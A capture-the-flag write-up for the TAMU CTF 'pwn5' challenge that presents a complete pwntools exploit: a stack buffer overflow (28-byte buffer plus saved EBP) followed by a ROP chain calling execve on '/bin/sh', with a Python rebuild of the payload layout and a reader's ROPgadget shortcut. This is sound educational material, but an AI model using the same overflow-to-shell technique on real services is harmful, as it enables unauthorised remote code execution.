**This script is intended to be just a shorter and more elegant solution, using pwntools' ROP submodule.**
If you want to actually understand how a ROP attack works (as I needed to before this challenge), this is **not** the write-up you're looking for.

```python
from pwn import *

conn = remote('pwn.ctf.tamu.edu', 4325)  # port is an int
#conn = process("./pwn5")

context.clear(arch='i386')
context.kernel = 'amd64'
binary = ELF('pwn5')

rop = ROP(binary)
binsh = 0x080f1a20  # global variable 'first_name'; it will hold the "/bin/sh" we send below
rop.execve(binsh, 0, 0)  # builds the call frame for execve(binsh, NULL, NULL) from the binary's own execve
# lucky we had it in the code!
DIMBUFFER = 28  # 0x1c-byte stack buffer; the extra 4 bytes below cover the saved EBP

conn.sendline(b"/bin/sh")  # saved in 'first_name'
conn.sendline(b":P")
conn.sendline(b":P")
conn.sendline(b"y")
conn.sendline(b"2")
#print(rop.dump())  # show the generated chain
conn.sendline(cyclic(DIMBUFFER + 4) + rop.chain())  # padding up to the saved return address, then the chain

conn.interactive()  # enjoy your shell
```
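To make the padding arithmetic and the frame that `rop.execve(binsh, 0, 0)` emits concrete, here is an added pure-Python illustration. It is not part of the original write-up and needs no pwntools; the buffer size (0x1c) and the `first_name` address (0x080f1a20) come from the script above, while the execve address is a placeholder, since the page never prints the value pwntools resolves from `ELF('pwn5')`.

```python
import struct

# Values from the write-up above.
BUF_SIZE = 0x1c               # 28-byte stack buffer (DIMBUFFER in the script)
SAVED_EBP = 4                 # on i386 the saved frame pointer sits right after the buffer
FIRST_NAME_ADDR = 0x080f1a20  # global 'first_name', receives the "/bin/sh" string
# Hypothetical placeholder: the real value is ELF('pwn5').symbols['execve'], not shown on the page.
EXECVE_ADDR_PLACEHOLDER = 0x08048000


def p32(value):
    """Pack a 32-bit little-endian dword, the same thing pwntools' p32 does on i386."""
    return struct.pack('<I', value & 0xffffffff)


def call_frame(func_addr, args, ret_slot=0x41414141):
    """i386 cdecl call frame as it must appear on the stack when 'ret' jumps to func_addr:
    [func][return slot][arg0][arg1]...  The callee reads its arguments relative to ESP,
    so the slot right after func_addr is the address it will return to. In a one-call
    chain that slot is never reached, so any value works (pwntools fills it with padding)."""
    frame = p32(func_addr) + p32(ret_slot)
    for arg in args:
        frame += p32(arg)
    return frame


def ret_offset(buf_size=BUF_SIZE):
    """Distance from the start of the buffer to the saved return address."""
    return buf_size + SAVED_EBP


def build_payload(buf_size=BUF_SIZE, execve_addr=EXECVE_ADDR_PLACEHOLDER, binsh=FIRST_NAME_ADDR):
    """Filler for buffer + saved EBP, then the execve frame landing on the return address."""
    padding = b'A' * ret_offset(buf_size)
    chain = call_frame(execve_addr, [binsh, 0, 0])
    return padding + chain


def layout(payload, buf_size=BUF_SIZE):
    """Describe the chain part of the payload as (offset, label, dword) tuples,
    the same information pwntools' rop.dump() prints for its own chain."""
    labels = ['execve', 'return slot (unused)', 'arg0: pathname -> first_name',
              'arg1: argv (NULL)', 'arg2: envp (NULL)']
    base = ret_offset(buf_size)
    out = []
    for i, label in enumerate(labels):
        pos = base + 4 * i
        (dword,) = struct.unpack('<I', payload[pos:pos + 4])
        out.append((pos, label, dword))
    return out


if __name__ == '__main__':
    for off, label, dword in layout(build_payload()):
        print('0x%04x  %-30s 0x%08x' % (off, label, dword))
```

Both the script's `cyclic(DIMBUFFER + 4)` and the commenter's `'a' * (0x1c + 4)` are the same 32 bytes of filler computed by `ret_offset()`; everything after it is the frame pwntools generated.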

kataryniarz, Feb. 27, 2018, 1:12 a.m.

Look at this:
```
ROPgadget --binary ./pwn5 --ropchain
```
I just needed to add padding: `'a' * (0x1c + 4)`. That probably was the shortest solution.